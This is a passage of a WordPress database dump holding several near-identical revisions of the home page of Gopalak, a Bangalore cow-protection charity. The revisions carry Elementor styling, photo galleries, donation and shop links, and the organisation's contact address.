.elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-17 11:23:19','2022-10-17 05:53:19','',1373,'https://gopalak.in/?p=1830',0,'revision','',0),(1831,1,'2022-10-17 11:23:19','2022-10-17 05:53:19','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-17 11:23:19','2022-10-17 05:53:19','',1373,'https://gopalak.in/?p=1831',0,'revision','',0),(1832,1,'2022-10-17 11:23:19','2022-10-17 05:53:19','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-17 11:23:19','2022-10-17 05:53:19','',1373,'https://gopalak.in/?p=1832',0,'revision','',0),(1833,1,'2022-10-17 11:28:35','0000-00-00 00:00:00','','Elementor #1833','','draft','closed','closed','','','','','2022-10-17 11:28:35','2022-10-17 05:58:35','',0,'https://gopalak.in/?page_id=1833',0,'page','',0),(1834,1,'2022-10-17 11:27:22','2022-10-17 05:57:22','','Elementor #1833','','inherit','closed','closed','','1833-revision-v1','','','2022-10-17 11:27:22','2022-10-17 05:57:22','',1833,'https://gopalak.in/?p=1834',0,'revision','',0),(1839,1,'2022-10-19 11:27:41','2022-10-19 05:57:41','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 11:27:41','2022-10-19 05:57:41','',1373,'https://gopalak.in/?p=1839',0,'revision','',0),(1840,1,'2022-10-19 11:27:41','2022-10-19 05:57:41','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 